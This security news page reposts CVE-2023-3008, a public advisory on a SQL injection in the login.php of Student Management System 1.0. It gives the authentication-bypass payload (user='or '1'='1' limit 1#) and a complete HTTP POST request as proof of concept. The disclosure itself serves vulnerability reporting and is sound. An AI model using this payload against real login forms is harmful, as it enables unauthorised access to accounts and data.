Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-3008: webray.com.cn/sql_inject.md at main · Xor-Gerke/webray.com.cn

A vulnerability classified as critical has been found in ningzichun Student Management System 1.0. This affects an unknown part of the file login.php. The manipulation of the argument user/pass leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-230355.

CVE
Open in Source
#sql#vulnerability#web#mac#windows#apache#git#intel#php#auth#firefox

Permalink

student-management-system login.php user SQL inject****Exploit Title: student-management-system login.php user SQL inject****Exploit Author: [email protected] inc****Vendor Homepage: https://github.com/ningzichun/student-management-system****Software Link: https://github.com/ningzichun/student-management-system****Version: student-management-system 1.0****Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql****Description

The reason for the SQL injection vulnerability is that the website application does not verify the validity of the data submitted by the user to the server (type, length, business parameter validity, etc.), and does not effectively filter the data input by the user with special characters , so that the user’s input is directly brought into the database for execution, which exceeds the expected result of the original design of the SQL statement, resulting in a SQL injection student-management-system does not filter the content correctly at the “login.php” user module, resulting in the generation of SQL injection.

Payload used:

user=’or ‘1’=’1’ limit 1#&pass=’or ‘1’=’1’ limit 1#&submit=%E6%8F%90%E4%BA%A4

Proof of Concept

  1. Open login.php source code.

  2. POST SQL injection payload (user=’or ‘1’=’1’ limit 1#&pass=’or ‘1’=’1’ limit 1#&submit=%E6%8F%90%E4%BA%A4)

  3. Html Request Code

POST /student/login.php HTTP/1.1
Host: 172.24.6.107:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Origin: http://172.24.6.107:8081
Connection: close
Referer: http://172.24.6.107:8081/student/?retry=1
Cookie: PHPSESSID=44sif2lb4iq80ieksie1intac7
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

user='or '1'='1' limit 1#&pass='or '1'='1' limit 1#&submit=%E6%8F%90%E4%BA%A4
  1. user login

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE